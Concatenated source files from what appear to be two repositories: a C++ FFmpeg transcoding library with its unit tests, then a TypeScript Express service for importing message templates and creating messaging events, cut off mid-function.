while (!eof) {
AVPacket pkt;
int ret = av_read_frame(formatContext, &pkt);
if (ret < 0) {
av_free_packet(&pkt);
if (ret != -32) {
char* s = new char[1024];
av_strerror(ret, s, 1024);
LOG4CPLUS_DEBUG(logger,
"Read frame failed: " << s << "[" << ret << "]");
delete s;
}
return;
}
if (ret == EAGAIN) {
LOG4CPLUS_WARN(logger, "Stream " << pkt.stream_index << " EAGAIN");
} else {
int streamIdx = pkt.stream_index;
if (streamIdx < ffStreams.size()) {
FFmpegStream& ffStream = ffStreams[streamIdx];
switch (ffStream.getType()) {
case AUDIO: {
FFmpegAudioStream& audioStream = dynamic_cast<FFmpegAudioStream&>(ffStream);
AudioEvent audioEvent(pkt, audioStream);
notifyObservers(audioEvent);
}
break;
case VIDEO: {
FFmpegVideoStream& videoStream = dynamic_cast<FFmpegVideoStream&>(ffStream);
VideoEvent videoEvent(pkt, videoStream);
notifyObservers(videoEvent);
}
break;
default:
break;
}
} else {
LOG4CPLUS_DEBUG(logger, "Ignoring new stream " << streamIdx);
}
}
}
}
<file_sep>/src/streams/StreamFactory.cpp
/*
* StreamFactory.cpp
*
* Created on: 21 May 2012
* Author: mediabag
*/
#include "StreamFactory.hpp"
//FFmpegVideoStream StreamFactory::makeVideoStream(
// FFmpegEncodingContainer container, int streamId, bool copy, int frameWidth, int frameHeight, float frameAspectRatio) {
// AVStream *st = st = av_new_stream(container.oc, streamId);
// if (!st) {
// throw new TranscodeException("Could not allocate copy stream");
// }
// st->stream_copy = 1;
// st->codec->codec_type = AVMEDIA_TYPE_VIDEO;
// st->codec->sample_aspect_ratio = st->sample_aspect_ratio = av_d2q(
// frameAspectRatio * frameHeight / frameWidth, 255);
// return FFmpegVideoStream(st, container.oc);
//}
//FFmpegVideoStream StreamFactory::makeVideoStream(string codec,
// int id, AVRational frameRate, int frameWidth, int frameHeight,
// PixelFormat framePixFmt) {
//
//}
<file_sep>/src/TranscodeException.hpp
/*
* TranscodeException.h
*
* Created on: 25 Sep 2011
* Author: mediabag
*/
#ifndef TRANSCODEEXCEPTION_H_
#include "fixstdint.hpp"
extern "C" {
#include <libavutil/avutil.h>
}
#define TRANSCODEEXCEPTION_H_
#include <exception>
#include <sstream>
using namespace std;
class TranscodeException: public std::exception {
stringstream msg;
void append(int avErrorCode);
public:
TranscodeException();
TranscodeException(const TranscodeException&);
TranscodeException(string &msg);
TranscodeException(int avErrorCode);
TranscodeException(string &msg, int avErrorCode);
TranscodeException(const char*, int avErrorCode);
TranscodeException(const char*);
virtual const char* what() const throw();
virtual ~TranscodeException() throw();
};
#endif /* TRANSCODEEXCEPTION_H_ */
<file_sep>/src/FFmpegEncodingContainer.cpp
/*
* FFmpegEncoder.cpp
*
* Created on: 21 May 2012
* Author: mediabag
*/
#include "FFmpegEncodingContainer.hpp"
string ContainerList::getContainer(string name) {
map<string, string>::iterator itr = formats.find(name);
if (itr != formats.end()) {
return itr->second;
} else {
return "";
}
}
map<string, string> ContainerList::getContainers() {
return formats;
}
FFmpegEncodingContainer::FFmpegEncodingContainer(AVFormatContext* fc) :
FFmpegContainer(Logger::getInstance(LOG4CPLUS_TEXT("FFmpegEncoder"))), oc(fc) {
// TODO Auto-generated constructor stub
}
FFmpegEncodingContainer::~FFmpegEncodingContainer() {
// TODO Auto-generated destructor stub
}
string FFmpegEncodingContainer::getContainerId() {
return string(oc->oformat->name);
}
string FFmpegEncodingContainer::getContainerName() {
return string(oc->oformat->long_name);
}
FFmpegEncodingContainer* FFmpegEncodingContainer::makeContainer(string ct) {
if (!getContainerList().getContainer(ct).empty()) {
AVFormatContext *oc;
int err = avformat_alloc_output_context2(&oc, (AVOutputFormat*) NULL,
ct.c_str(), NULL);
if (!oc) {
checkForError(err);
}
return new FFmpegEncodingContainer(oc);
} else {
return NULL;
}
}
<file_sep>/src/tests/FFmpegEncodingContainerTests.cpp
#include <gtest/gtest.h>
#include "../FFmpegEncodingContainer.hpp"
TEST(FFmpegEncodingContainer, ContainerFactory) {
FFmpegEncodingContainer* container = FFmpegEncodingContainer::makeContainer(
"webm");
ASSERT_TRUE(container != NULL);
ASSERT_STREQ("webm", container->getContainerId().c_str());
ASSERT_STREQ("WebM file format", container->getContainerName().c_str());
}
<file_sep>/src/streams/FFmpegVideoStream.hpp
#ifndef FFMPEGVIDEOSTREAM_H_
#define FFMPEGVIDEOSTREAM_H_
#include "FFmpegStream.hpp"
class Picture {
shared_ptr<AVFrame> picture;
public:
Picture(shared_ptr<AVFrame> sourcePic) :
picture(sourcePic) {
}
Picture(AVFrame* sourcePic) :
picture(sourcePic) {
}
virtual ~Picture() {
}
shared_ptr<AVFrame> getFrame() {
return picture;
}
};
class FFmpegVideoStream: public FFmpegStream {
public:
FFmpegVideoStream(AVStream* avs, AVFormatContext* afc, int streamIndex) :
FFmpegStream(avs, afc, "FFmpegVideoStream", streamIndex) {
}
virtual ~FFmpegVideoStream() {
}
virtual StreamType getType() {
return VIDEO;
}
shared_ptr<Picture> decode(PacketPtr);
FFmpegVideoStream* clone() const {
return new FFmpegVideoStream(*this);
}
};
static shared_ptr<Picture> NoPicture(new Picture(shared_ptr<AVFrame>()));
#endif
<file_sep>/src/tests/TestRunner.cpp
#include "../fixstdint.hpp"
#include <gtest/gtest.h>
#include <log4cplus/logger.h>
#include <log4cplus/configurator.h>
extern "C" {
#include <libavcodec/avcodec.h>
#include <libavformat/avformat.h>
}
using namespace log4cplus;
int main(int argc, char **argv) {
::testing::InitGoogleTest(&argc, argv);
BasicConfigurator::doConfigure();
avcodec_register_all();
av_register_all();
return RUN_ALL_TESTS();
}
<file_sep>/src/FFmpeg.hpp
/*
* FFmpeg.hpp
*
* Created on: 23 May 2012
* Author: mediabag
*/
#ifndef FFMPEG_HPP_
#define FFMPEG_HPP_
#include "fixstdint.hpp"
extern "C" {
#include <libavcodec/avcodec.h>
#include <libavformat/avformat.h>
}
#endif /* FFMPEG_HPP_ */
<file_sep>/src/FFmpegContainer.hpp
/*
* FFmpegProcessor.hpp
*
* Created on: 21 May 2012
* Author: mediabag
*/
#ifndef FFMPEGPROCESSOR_HPP_
#define FFMPEGPROCESSOR_HPP_
#include "FFmpeg.hpp"
#include <log4cplus/logger.h>
#include <log4cplus/configurator.h>
#include <boost/ptr_container/ptr_vector.hpp>
#include "streams/FFmpegStream.hpp"
#include "streams/FFmpegAudioStream.hpp"
#include "streams/FFmpegVideoStream.hpp"
#include "streams/StreamReader.hpp"
using namespace log4cplus;
using namespace std;
class FFmpegContainer {
protected:
const Logger logger;
AVFormatContext *formatContext;
AVIOContext *context;
boost::ptr_vector<FFmpegStream> ffStreams;
const static int BUF_SIZE = 4096;
const static int BUF_SIZE_ADJUSTED = 4096 + AVPROBE_PADDING_SIZE;
FFmpegContainer(const Logger& l) :
logger(l) {
formatContext = NULL;
context = NULL;
};
virtual ~FFmpegContainer() {
if (formatContext != NULL) {
avformat_free_context(formatContext);
}
if (context != NULL) {
av_free(context);
}
}
public:
boost::ptr_vector<FFmpegStream> getStreams() {
return ffStreams;
}
};
void checkForError(int code);
#endif /* FFMPEGPROCESSOR_HPP_ */
<file_sep>/src/Helper.cpp
/*
* Helper.cpp
*
* Created on: 23 May 2012
* Author: mediabag
*/
#include "Helper.hpp"
CodecID CodecList::resolveCodec(string name) {
return codecs.find(name)->second;
}
set<string> CodecList::getCodecNames() {
set<string> codecNames;
for(CodecResolverType::iterator it = codecs.begin(); it != codecs.end(); ++it) {
codecNames.insert(it->first);
}
return codecNames;
}
<file_sep>/src/Helper.hpp
/*
* Helper.cpp
*
* Created on: 23 May 2012
* Author: mediabag
*/
#ifndef HELPER_CPP_
#define HELPER_CPP_
#include "FFmpeg.hpp"
#include <map>
#include <string>
#include <set>
#include <log4cplus/logger.h>
#include <log4cplus/configurator.h>
using namespace std;
using namespace log4cplus;
class CodecList {
typedef map<CodecID, string> CodecNameType;
typedef map<string, CodecID> CodecResolverType;
Logger logger;
CodecNameType codecNames;
CodecResolverType codecs;
public:
CodecList() {
logger = Logger::getInstance(LOG4CPLUS_TEXT("CodecList"));
AVCodec *ac = av_codec_next(NULL);
while (ac) {
if (ac->long_name) {
codecNames[ac->id] = string(ac->long_name);
}
codecs[ac->name] = ac->id;
ac = av_codec_next(ac);
}
CodecNameType::const_iterator end = codecNames.end();
for (CodecNameType::const_iterator it = codecNames.begin(); it != end;
++it) {
LOG4CPLUS_DEBUG(logger, it->first << ": " << it->second);
}
}
CodecID resolveCodec(string name);
set<string> getCodecNames();
};
class ContainerList {
typedef map<string, string> FormatMapType;
Logger logger;
FormatMapType formats;
public:
ContainerList() {
logger = Logger::getInstance(LOG4CPLUS_TEXT("ContainerList"));
AVOutputFormat *af = av_oformat_next(NULL);
while (af) {
if (af->long_name) {
formats[af->name] = string(af->long_name);
}
af = av_oformat_next(af);
}
FormatMapType::const_iterator end = formats.end();
for (FormatMapType::const_iterator it = formats.begin(); it != end;
++it) {
LOG4CPLUS_DEBUG(logger, it->first << ": " << it->second);
}
}
string getContainer(string name);
map<string, string> getContainers();
};
#endif /* HELPER_CPP_ */
<file_sep>/src/streams/FFmpegStream.hpp
/*
* FFMpegStream.h
*
* Created on: 22 Sep 2011
* Author: mediabag
*/
#ifndef FFMPEGSTREAM_H_
#define FFMPEGSTREAM_H_
#include "../fixstdint.hpp"
#include <iostream>
#include <exception>
#include <queue>
#include "../TranscodeException.hpp"
#include <log4cplus/logger.h>
#include <log4cplus/configurator.h>
#include <boost/utility.hpp>
#include <boost/ptr_container/ptr_vector.hpp>
#include <boost/shared_ptr.hpp>
extern "C" {
#include <libavcodec/avcodec.h>
#include <libavformat/avformat.h>
}
using namespace log4cplus;
using namespace std;
using namespace boost;
enum StreamType {
AUDIO, VIDEO, UNKNOWN
};
typedef shared_ptr<AVPacket> PacketPtr;
class FFmpegStream {
protected:
AVStream* avStream;
AVCodec* codec;
AVFormatContext* formatContext;
int bps;
int nextPts;
bool start;
double pts;
int streamIndex;
Logger logger;
public:
static const float dtsDeltaThreshold = 10;
FFmpegStream(AVStream* avs, AVFormatContext* fc, string streamName,
int sIdx);
void adjustTimeStamps(AVPacket pkt);
virtual StreamType getType() {
return UNKNOWN;
}
virtual string getCodec() {
return string(codec->name);
}
virtual ~FFmpegStream() {
}
template<class DecodedDataType>
shared_ptr<DecodedDataType> decode(PacketPtr);
int getStreamIndex() {
return streamIndex;
}
virtual FFmpegStream* clone() const = 0;
};
FFmpegStream* new_clone(FFmpegStream const& other);
#endif /* FFMPEGSTREAM_H_ */
<file_sep>/src/streams/FFmpegStream.cpp
/*
* FFMpegStream.cpp
*
* Created on: 22 Sep 2011
* Author: mediabag
*/
#include "FFmpegStream.hpp"
using namespace std;
FFmpegStream::FFmpegStream(AVStream* avs, AVFormatContext* fc,
string streamName, int sIdx) :
avStream(avs), formatContext(fc), streamIndex(sIdx), logger(
Logger::getInstance(LOG4CPLUS_TEXT(streamName))) {
codec = avcodec_find_decoder(avs->codec->codec_id);
int open = avcodec_open(avStream->codec, codec);
if (open < 0) {
throw new TranscodeException("Failed to open codec", open);
}
bps = av_get_bytes_per_sample(avStream->codec->sample_fmt) >> 3;
pts = avStream->avg_frame_rate.num ?
-avStream->codec->has_b_frames * AV_TIME_BASE
/ av_q2d(avStream->avg_frame_rate) :
0;
nextPts = AV_NOPTS_VALUE;
start = 1;
}
;
void FFmpegStream::adjustTimeStamps(AVPacket pkt) {
if (pkt.dts != AV_NOPTS_VALUE)
pkt.dts += av_rescale_q(0, AV_TIME_BASE_Q, avStream->time_base);
if (pkt.pts != AV_NOPTS_VALUE)
pkt.pts += av_rescale_q(0, AV_TIME_BASE_Q, avStream->time_base);
//input file scaling
// if (pkt.stream_index < nb_input_files_ts_scale[file_index]
// && input_files_ts_scale[file_index][pkt.stream_index]) {
// if (pkt.pts != AV_NOPTS_VALUE)
// pkt.pts *= input_files_ts_scale[file_index][pkt.stream_index];
// if (pkt.dts != AV_NOPTS_VALUE)
// pkt.dts *= input_files_ts_scale[file_index][pkt.stream_index];
// }
if (pkt.dts != AV_NOPTS_VALUE && nextPts != AV_NOPTS_VALUE
&& (formatContext->iformat->flags & AVFMT_TS_DISCONT)) {
int64_t pkt_dts = av_rescale_q(pkt.dts, avStream->time_base,
AV_TIME_BASE_Q);
int64_t delta = pkt_dts - nextPts;
if ((FFABS(delta) > 1LL * dtsDeltaThreshold * AV_TIME_BASE
|| pkt_dts + 1 < pts)) { // && !copy_ts - invesitgate copy timestamps
//input_files_ts_offset[ist->file_index] -= delta;
//ffmpeg.c 2891 add this back in
LOG4CPLUS_WARN(logger, "Timestamp discontinuity " << delta);
pkt.dts -= av_rescale_q(delta, AV_TIME_BASE_Q, avStream->time_base);
if (pkt.pts != AV_NOPTS_VALUE)
pkt.pts -= av_rescale_q(delta, AV_TIME_BASE_Q,
avStream->time_base);
}
}
}
FFmpegStream* new_clone(FFmpegStream const& other) {
return other.clone();
}
<file_sep>/src/streams/StreamFactory.hpp
/*
* StreamFactory.hpp
*
* Created on: 21 May 2012
* Author: mediabag
*/
#ifndef STREAMFACTORY_HPP_
#define STREAMFACTORY_HPP_
#include "FFmpegAudioStream.hpp"
#include "FFmpegVideoStream.hpp"
#include "../FFmpegEncodingContainer.hpp"
#include <set>
using namespace std;
class StreamFactory {
public:
static FFmpegVideoStream makeVideoStream(FFmpegEncodingContainer container,
int streamId, bool copy, int frameWidth, int frameHeight,
float frameAspectRatio);
static FFmpegVideoStream makeVideoStream(string codec, int id,
AVRational frameRate, int frameWidth, int frameHeight,
PixelFormat framePixFmt);
static CodecList& getCodecList() {
static CodecList codecList; // constructor runs once, when someone first needs it
return codecList;
}
};
#endif /* STREAMFACTORY_HPP_ */
| e6bd3db5e14d979d2621e2fd42c3cf1de1260ca7 | [
"C++"
] | 28 | C++ | sumo/transPlus | 14e754e5bb610225c9c48b9b6d811f858df9b13f | 0cc811d9dec061571f0dc12cf4b3346f794532c4 |
refs/heads/master | <file_sep>import { Style } from '../../components/customForm/customForm';
export const form : Style = {
fontSize : 18,
color: 'white',
backgroundColor: 'Transparent',
margin : 0,
fontFamily: 'Monaco',
}
export const formPopUp : Style = {
fontSize : 18,
color: 'black',
backgroundColor: 'Transparent',
margin : 0,
fontFamily: 'Monaco',
}<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
box: {
padding : 5,
display: 'flex',
flexDirection: 'row',
margin: 0,
backgroundColor: 'red',
},
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
import { Style } from './customButton';
export const useStyles = makeStyles(thme =>
({
button: {
margin: 10,
backgroundColor: (props : Style ) => props.backgroundColor,
padding: (props : Style ) => props.margin,
borderRadius: 5
},
typography: {
color: (props : Style ) => props.color,
fontFamily: 'Monaco',
borderRadius:2,
fontSize: (props : Style ) => props.fontSize,
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
box: {
alignItems:'center',
justifyContent: 'center',
display:'flex',
margin : '10%',
},
image: {
borderRadius:30,
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
typography : {
fontSize : (props : any) => props.fontSize,
backgroundColor : (props : any) => props.backgroundColor,
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
import { Style } from './customForm';
export const useStyles = makeStyles(thme =>
({
button: {
margin: 10,
backgroundColor: (props: Style) => props.backgroundColor,
padding: (props: Style) => props.margin,
},
typography: {
color: (props: Style) => props.color,
fontFamily: (props: Style) => props.fontFamily,
borderRadius: 2,
fontSize: (props: Style) => props.fontSize,
},
box: {
width: '80%',
minWidth: 400,
margin: 5,
padding: 5,
alignItems: 'center',
justifyContent: 'center',
display: 'flex',
flexDirection: 'column',
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
box: {
padding : 5,
display: 'flex',
flexDirection: 'row',
margin: 0,
backgroundColor: '#037682',
alignItems: 'center',
},
link: {
backgroundColor : 'white',
margin : 10,
color: 'black',
padding: 10,
fontFamily: 'Monaco',
borderRadius:10,
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
typography : {
fontSize : 18,
color: 'white',
margin : 0,
fontFamily: 'Monaco',
},
typographyTitle : {
fontSize : 25,
color: 'white',
margin : 3,
fontFamily: 'Monaco',
},
box : {
alignItems:'center',
justifyContent: 'center',
display:'flex',
flexDirection:'column',
width: '95%',
margin : 'auto',
marginTop: '5%',
backgroundColor: '#037682',
borderRadius:10,
},
button : {
fontSize : 12,
color: 'white',
margin : 5,
fontFamily: 'Monaco',
},
link: {
float: 'none',
color: 'black',
textDecoration : 'none',
display: 'block',
textAlign: 'left',
padding: 12,
"&:hover": {
background: "#efefef"
}
},
dropdown: {
display: 'block',
position: 'absolute',
backgroundColor : '#f9f9f9',
minWidth : 160,
zIndex: 1,
},
searchBarForm :{
minHeight : 42,
minWidth : 170,
height : '60%',
},
searchBar : {
minWidth : 170,
height : '90%',
minHeight : 40,
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
box: {
alignItems: 'center',
justifyContent: 'center',
display: 'flex',
flexDirection: 'column',
margin: 2,
},
typography: {
fontSize: 20,
color: 'black',
padding: 10,
fontFamily: 'Monaco',
fontWeight: 'bold'
},
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
box : {
alignItems:'center',
justifyContent: 'center',
display:'flex',
flexDirection:'column',
margin : 0,
backgroundColor : 'green'
},
title :{
backgroundColor: 'red',
}
})
);
<file_sep>import { Style } from '../../components/customButton/customButton';
export const subButton : Style = {
backgroundColor : 'transparent',
color : 'black',
fontSize: 14,
margin : 2,
}
export const button : Style = {
backgroundColor : 'white',
color : 'black',
fontSize: 18,
margin : 5,
}
export const titleButton : Style = {
backgroundColor : 'white',
color : 'black',
fontSize: 25,
margin : 5,
}
export const listButton : Style = {
backgroundColor : '#02525b',
color : 'white',
fontSize: 18,
margin : 2,
}<file_sep>import { UserType } from "../../components/userLogin/userLogin";
const base = 'http://localhost:3001/api/v1';
export const api = {
register: {
patient: base + '/patients/auth/register',
caregiver: base + '/caregivers/auth/register',
secretary: base + '/secretaries/auth/register',
},
doctorPatient : base + '/caregivers/view/patients',
patients: base + '/patients',
caregivers: base + '/caregivers',
login: base + '/auth/login',
welcome: base + '/welcome',
Rooms: base + '/rooms',
getpatient: base + '/patients',
rooms : {
rooms : base + '/rooms',
},
delete: {
patient: base + '/patients/delete/:id?id=',
},
details: {
patient: base + '/patients/view/details',
caregiver: base + '/caregivers/view/details',
secretary: base + '/secretaries/view/details',
},
update: {
patient: base + '/patients/update/:id?id=',
caregiver: base + '/caregivers/update/:id?id=',
secretary: base + '/secretaries/update/:id?id=',
},
search : base + '/search/:request?request=',
getUserType : base + "/users/get/:token",
healthfile : {
view : base + '/healthfile/view/:id?id=',
create : base + '/healthfile/create/:id?id=',
update: base + '/healthfile/update/:id?id=',
delete: base + '/healthfile/delete/:id?id=',
},
consumable : {
viewall : base + '/consumable',
create : base + '/consumable',
update: base + '/consumable/update/:id?id=',
delete: base + '/consumable/delete/:id?id=',
viewspecific: base + '/consumable/view/:id?id=',
},
consumableType : {
viewall : base + '/consumableType',
create : base + '/consumableType',
update: base + '/consumableType/update/:id?id=',
delete: base + '/consumableType/delete/:id?id=',
viewspecific: base + '/consumableType/view/:id?id=',
},
equipment : {
view : base + '/rooms/equipments',
create : base + '/rooms/equipments/add/:id?id=',
update: base + '/rooms/equipments/update',
delete: base + '/rooms/equipments/delete/:id?id=',
},
equipmentType : {
view : base + '/rooms/equipments/type',
create : base + '/rooms/equipments/type/add',
update: base + '/rooms/equipments/type/update',
delete: base + '/rooms/equipments/type/delete/:id?id=',
}
}
// export const GetRoombyId = (room: Room) => {
// return api.Rooms + '/view/:id?id=' + healthFile.id;
// }
export const getRegister = (type: UserType) => {
switch (type) {
case 'caregiver':
return api.register.caregiver;
break;
case 'secretary':
return api.register.secretary;
break;
case 'patient':
return api.register.patient;
break;
}
}
export const getDetails = (type: UserType) => {
switch (type) {
case 'caregiver':
return api.details.caregiver;
break;
case 'secretary':
return api.details.secretary;
break;
case 'patient':
return api.details.patient;
break;
}
}
export const getUpdate = (type: UserType) => {
switch (type) {
case 'caregiver':
return api.update.caregiver;
break;
case 'secretary':
return api.update.secretary;
break;
case 'patient':
return api.update.patient;
break;
}
}
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
typography : {
fontSize : 18,
color: 'white',
margin : 0,
fontFamily: 'Monaco',
},
typographyTitle : {
fontSize : 25,
color: 'white',
margin : 3,
fontFamily: 'Monaco',
},
box : {
alignItems:'center',
justifyContent: 'center',
display:'flex',
flexDirection:'column',
width: '95%',
margin : 'auto',
marginTop: '5%',
backgroundColor: '#037682',
borderRadius:10,
},
button : {
fontSize : 12,
color: 'white',
margin : 5,
fontFamily: 'Monaco',
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
button: {
margin: 10,
backgroundColor: 'white',
padding: 10,
},
typography: {
color: 'black',
fontFamily: 'Monaco',
borderRadius: 2,
fontSize: 20
},
background: {
height: '90vh',
},
content: {
backgroundColor: '#4e9fa7',
alignItems: 'center',
justifyContent: 'center',
display: 'flex',
flexDirection: 'row',
height: '75vh',
margin: 10,
borderRadius: 10,
},
appointements: {
width: '50%',
margin: 15
},
personalData: {
width: '50%',
margin: 15
},
box : {
height: '100vh',
width: '100vw',
margin: 'auto',
display: 'flex',
flexDirection: 'column',
}
})
);
<file_sep>import { makeStyles, createStyles } from '@material-ui/core/styles';
export const useStyles = makeStyles(thme =>
({
box: {
display: 'flex',
justifyContent: 'space-between',
alignItems: 'center', // To be vertically aligned
width: '100%',
margin: 0,
backgroundColor: '#037682',
},
typography: {
fontSize: 35,
fontWeight: 'bold',
marginLeft: 10,
marginRight: 10
},
button: {
fontSize: 18,
fontWeight: 'bold',
borderRadius: 10,
marginLeft: 10,
marginRight: 10,
backgroundColor: '#1c838e',
margin: 10
}
})
);
| e012bc9d3230bc85e295744ac094e6cf3d2024dd | [
"TypeScript"
] | 16 | TypeScript | Dieselow/archi-company-project-web | 94a9b97119a939b9296bf57d874ba5f70bf7b431 | ced87447d812cfb7536d4fc25d8138915cb75389 |
refs/heads/master | <repo_name>jkes900136/messagingSystem<file_sep>/src/templateWS.ts
import { Router } from "express"
import { v4 as uuidv4 } from "uuid"
import * as messageTemplateService from "./services/messageTemplateService"
import * as catalogService from "./services/catalogService"
import { Catalog, MessageTemplate } from "./model"
import * as XLSX from 'xlsx'
const router = Router()
router.post("/importTemplate", async (req, res) => {
let base64String = req.body.file;
let base64Image = base64String.split(';base64,').pop();
/* data is a node Buffer that can be passed to XLSX.read */
let workbook = XLSX.read(base64Image, { type: 'base64' });
let data: string[][] = XLSX.utils.sheet_to_json(workbook.Sheets[workbook.SheetNames[0]], { header: 1 });
let userId = ""
let name: string = ""
let type: Catalog['type'] = "static"
let messageTemplateUploads = new Array<{ title: string, content: string, thumb: string }>()
if (req.body.hasOwnProperty("userId")) {
userId = req.body.userId
}
if (req.body.hasOwnProperty("name")) {
name = req.body.name
}
if (req.body.hasOwnProperty("type")) {
type = req.body.type
}
for (let i = 1; i < data.length; i++) {
let cols = data[i]
if (cols.length <= 1) {
cols[1] = ""
}
if (cols.length >= 2) {
let newData = {
title: cols[0] || "",
content: cols[1] || "",
thumb: cols[2] || ""
}
messageTemplateUploads.push({
title: cols[0].toString().trim(),
content: cols[1].toString().trim(),
thumb: cols[2].toString().trim()
})
}
}
let newCatalog: Catalog = { id: uuidv4(), name: name, messageId: [], userId: userId, index: new Date().getTime(), type: type }
// let newMessageTemplate: MessageTemplate = { id: uuidv4(), title: "", content: "", thumb: "" }
const catalogSnapshot = await catalogService.getCatalogByNameAndUserId(name, userId)
if (catalogSnapshot.length > 0) {
newCatalog.id = catalogSnapshot[0].id
newCatalog.messageId = catalogSnapshot[0].messageId
newCatalog.index = catalogSnapshot[0].index
newCatalog.type = catalogSnapshot[0].type
} else {
}
for (const messageTemplateUpload of messageTemplateUploads) {
/**
* 檢查主檔是否存在
*/
const messageTemplateSnapshot = await messageTemplateService.getMessageTemplateByContent(messageTemplateUpload.content)
if (messageTemplateSnapshot.empty) {
console.log("====不存在====")
let newMessageTemplate: MessageTemplate = {
id: uuidv4(),
title: messageTemplateUpload.title,
content: messageTemplateUpload.content,
thumb: messageTemplateUpload.thumb,
type: ""
}
if (newCatalog.messageId.indexOf(newMessageTemplate.id) < 0) {
newCatalog.messageId.push(newMessageTemplate.id)
}
messageTemplateService.setMessageTemplate(newMessageTemplate)
} else {
// 若存在則檢查是否更新
let newMessageTemplate = messageTemplateSnapshot.docs[0].data() as MessageTemplate
if (messageTemplateUpload.title) {
newMessageTemplate.title = messageTemplateUpload.title
}
// console.log("memberUpload:", memberUpload)
if (messageTemplateUpload.content) {
newMessageTemplate.content = messageTemplateUpload.content
}
if (messageTemplateUpload.thumb) {
newMessageTemplate.thumb = messageTemplateUpload.thumb
}
if (newCatalog.messageId.indexOf(newMessageTemplate.id) < 0) {
newCatalog.messageId.push(newMessageTemplate.id)
}
messageTemplateService.setMessageTemplate(newMessageTemplate)
}
}
console.log("newCatalog:", newCatalog)
await catalogService.setCatalog(newCatalog).then(success => {
res.sendStatus(200)
}).catch(err => {
res.sendStatus(403)
})
})
router.get("/getCatalogByTypeAndUserId", async (req, res) => {
const catalogType = req.query.type
const userId = req.query.userId
console.log(catalogType)
const works = await catalogService.getCatalogByNameAndUserId(catalogType, userId)
if (works.length != 0) {
res.status(200).send(works[0])
} else {
res.sendStatus(403)
}
})
router.post("/updateCatalog", async (req, res) => {
const catalogUpload = req.body as Catalog
console.log(JSON.stringify(catalogUpload, null, 4))
if (catalogUpload && catalogUpload != null) {
const newCatalog: Catalog = {
...catalogUpload
}
await catalogService.setCatalog(newCatalog)
res.sendStatus(200)
} else {
res.sendStatus(403)
}
})
router.delete("/deleteCatalog/:catalogId", async (req, res) => {
const id = req.params.catalogId as string
await catalogService.deleteCatalog(id).then(success => {
res.sendStatus(200)
}).catch(err => {
res.sendStatus(403)
})
})
router.post("/updateTemplate", async (req, res) => {
const newTemplate = req.body as MessageTemplate
console.log(JSON.stringify(newTemplate, null, 4))
if (newTemplate.content != "") {
console.log("====建立====", newTemplate.title)
const newWork: MessageTemplate = {
...newTemplate
}
await messageTemplateService.setMessageTemplate(newWork)
res.sendStatus(200)
} else {
res.sendStatus(403)
}
})
router.delete("/deleteTemplate/:messageId", async (req, res) => {
const messageId = req.params.messageId as string
await messageTemplateService.deleteMessageTemplate(messageId).then(success => {
res.sendStatus(200)
}).catch(err => {
res.sendStatus(403)
})
})
export default router<file_sep>/src/pubSubEvent.ts
import { Router } from "express"
import * as PubSub from "@google-cloud/pubsub"
import { pubsubConfig, pubsubSwitch, PORT } from './config';
import { Event, PubSubEvent, Member, MessageTemplate, User, EventResult, Receiver } from './model'
import axios from "axios"
import * as eventService from './services/eventService'
import * as memberService from "./services/memberService"
import { v4 as uuidv4 } from "uuid"
const googlePubsub = PubSub({ keyFilename: pubsubConfig.serviceAccountPath });
const messageTopicName = pubsubConfig.topicName + pubsubConfig.messageTopicName
const router = Router()
router.post("/createEvent", async (req, res) => {
console.log("===req.body.receiver===", req.body.receiver)
let receivers: Member[] = req.body.receivers
let updatePromise = new Array<Promise<any>>()
let eventObj: Event = {
id: uuidv4(),
timeStamp: new Date().getTime(),
receivers: receivers,
sender: { id: "system", name: "system", email: "", role: "staff" },
content: "",
channel: "WeChat",
urls: [],
thumb: ""
}
let period = ""
let location = ""
let address = ""
if (req.body.hasOwnProperty("sender")) {
eventObj.sender = req.body.sender
}
if (req.body.hasOwnProperty("content")) {
eventObj.content = req.body.content
}
if (req.body.hasOwnProperty("type")) {
eventObj.type = req.body.type
}
if (req.body.hasOwnProperty("channel")) {
eventObj.channel = req.body.channel
}
if (req.body.hasOwnProperty("urls")) {
eventObj.urls = req.body.urls
}
if (req.body.hasOwnProperty("thumb")) {
eventObj.thumb = req.body.thumb
}
if (req.body.hasOwnProperty("period")) {
period = req.body.period
}
if (req.body.hasOwnProperty("location")) {
location = req.body.location
}
if (req.body.hasOwnProperty("address")) {
address = req.body.address
}
console.log("===eventObj===", JSON.stringify(eventObj, null, 4))
receivers.forEach(async receiver => {
if (receiver.hasOwnProperty("groupId")) {
receiver['id'] = receiver.groupId
}
const memberSnapshot = await memberService.getMemberByIdAndName(receiver.id, receiver.name)
if (memberSnapshot.empty) {
const newMember: Member = {
...receiver
}
if (!newMember.hasOwnProperty("id")) {
if (!newMember.id || newMember.id == "") {
newMember.id = uuidv4()
}
}
if (receiver.hasOwnProperty('mobilePhone')) {
updatePromise.push(memberService.setMember(newMember).then(() => console.log("===create member success===")))
}
} else {
// const newMember: Member = {
// ...message,
// id: memberSnapshot.docs[0].data().id,
// division: memberSnapshot.docs[0].data().division,
// department: memberSnapshot.docs[0].data().department,
// lineId: memberSnapshot.docs[0].data().lineId,
// wechatId: memberSnapshot.docs[0].data().wechatId,
// email: memberSnapshot.docs[0].data().email,
// mobilePhone: memberSnapshot.docs[0].data().mobilePhone,
// }
// updatePromise.push(memberService.updateMember(newMember).then(() => console.log("===update member success===")))
console.log("== member exist===")
}
})
await Promise.all(updatePromise).then(updateRes => {
